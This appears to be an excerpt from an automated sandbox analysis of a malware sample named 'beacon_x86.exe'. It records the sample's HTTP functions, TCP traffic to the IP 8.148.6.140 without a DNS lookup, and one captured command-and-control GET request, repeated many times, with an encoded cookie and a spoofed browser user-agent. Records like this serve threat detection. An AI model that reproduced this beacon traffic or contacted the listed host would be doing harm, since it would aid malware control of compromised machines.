        Source: unknownTCP traffic detected without corresponding DNS query: 8.148.6.140
        Source: unknownTCP traffic detected without corresponding DNS query: 8.148.6.140
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 1_2_00D61C3F _memset,__snprintf,__snprintf,__snprintf,HttpOpenRequestA,HttpSendRequestA,InternetCloseHandle,InternetQueryDataAvailable,InternetReadFile,InternetCloseHandle,InternetCloseHandle,1_2_00D61C3F
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
